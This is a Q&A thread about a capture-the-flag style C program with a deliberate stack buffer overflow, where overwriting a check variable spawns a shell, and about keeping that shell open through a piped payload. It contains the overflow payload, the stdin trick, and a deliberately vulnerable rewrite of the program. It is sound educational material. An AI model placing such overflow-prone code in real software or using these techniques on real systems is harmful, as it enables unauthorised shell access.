# Spawned shell terminates quickly after buffer overflow

Tags: c, linux, shell, buffer-overflow

Here is the source code of the application to be exploited.
ch13.c:

```
#include <stdlib.h>
#include <stdio.h>

/*
gcc -o ch13 ch13.c -fno-stack-protector
*/


int main()
{

  int var;
  int check = 0x04030201;
  char buf[40];

  fgets(buf,45,stdin);

  printf("\n[buf]: %s\n", buf);
  printf("[check] %p\n", check);

  if ((check != 0x04030201) && (check != 0xdeadbeef))
    printf ("\nYou are on the right way !\n");

  if (check == 0xdeadbeef)
   {
     printf("Yeah dude ! You win !\n");
     system("/bin/dash");
   }
   return 0;
}
```

After running in the shell:

```
python -c 'print "A"*40 + "\xef\xbe\xad\xde"'|./ch13
```

It displays buffer content and "Yeah dude! you win!" but no new shell. GDB show that a new process is started but I am unable to interact with it. Is there are way of interacting with the spawned shell so that it doesnt terminate quickly?

Comment: Are you sure there is a `/bin/dash` on the system?

Comment: I'm curious what version of GCC you're using for this experiment -- my version (5.1.0) seems to order the variables `buf, var, check`, so the overflow only writes a nul byte into the first byte of `check`.  It took me 10 minutes of messing with the code to get the variables placed in the correct order on the stack.

Comment: Im using gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5)

Answer (score 9):

Assuming `/bin/dash` is a typo, and you meant `/bin/bash`...

You're piping input into the `ch13` program.  When it calls `system()`, the shell inherits `stdin` and `stdout` from the calling program, which means it's taking input from the same pipe.  However, by the time the shell starts executing, the pipe has already been emptied of all its input, and so the shell reads `EOF` and immediately terminates.  What you really want is to pass in that buffer overflow into `stdin`, and then keep putting stuff into `stdin` afterwards.  So, something like this should work:

```
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde" > magic_input
cat magic_input - | ./ch13
```

You may not see a bash prompt, but you should be able to type commands, hit enter, and get output.

**EDIT:** For future inquisitive visitors who may want to try this at home, you might want to use this updated version of the C program in the question.  My version of GCC was putting the variables on the stack in a different order.  Putting variables in a struct prevents GCC from reordering the variables however it pleases, so the buffer overrun should go right into the `check` variable as expected.

```
#include <stdlib.h>
#include <stdio.h>

/*
gcc -o ch13 ch13.c -fno-stack-protector
*/


int main()
{
  struct {
    char buf[40];
    int check;
  } locals = {.check = 0x04030201};

  fgets(locals.buf,45,stdin);

  printf("\n[buf]: %s\n", locals.buf);
  printf("[check] %p\n", locals.check);

  if ((locals.check != 0x04030201) && (locals.check != 0xdeadbeef))
    printf ("\nYou are on the right way !\n");

  if (locals.check == 0xdeadbeef)
   {
     printf("Yeah dude ! You win !\n");
     system("/bin/bash");
   }
   return 0;
}
```

Comment: Thank a lot for your help. Worked perfectly.